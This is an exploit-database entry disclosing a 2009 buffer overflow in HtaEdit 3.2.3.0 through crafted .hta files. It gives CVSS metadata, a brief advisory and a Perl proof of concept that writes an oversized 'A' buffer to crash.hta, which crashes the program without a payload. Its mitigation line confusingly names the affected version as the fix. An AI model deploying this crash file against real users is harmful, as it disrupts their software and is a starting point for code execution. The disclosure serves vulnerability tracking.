HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability

vendor:

HtaEdit

by:

anT!-Tr0J4n

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: HtaEdit

Affected Version From: 3.2.3.0

Affected Version To: 3.2.3.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:htaedit:htaedit:3.2.3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp3

2009

HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability

HtaEdit v 3.2.3.0 is vulnerable to a buffer overflow vulnerability when a maliciously crafted .hta file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a specially crafted .hta file.

Mitigation:

Update to the latest version of HtaEdit v 3.2.3.0 or later.

Source

Exploit-DB raw data:

#Title: HtaEdit v 3.2.3.0 (.hta) Buffer Overflow Vulnerability

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil

#special thanks    :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu

#Home     :   www.Dev-PoinT.com ; $ http://inj3ct0r.com

#Software :  http://www.htaedit.com/

#Tested on:   Windows XP sp3

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#!/usr/bin/perl
print " Author: anT!-Tr0J4n      \n";
print " Greetz :http://inj3ct0r.com    ; \n";
print "Home : www.Dev-PoinT.com ; \n";

my $junk= "\x41" x 43500 ;
open(file,">crash.hta");
print file $junk ;
close(file);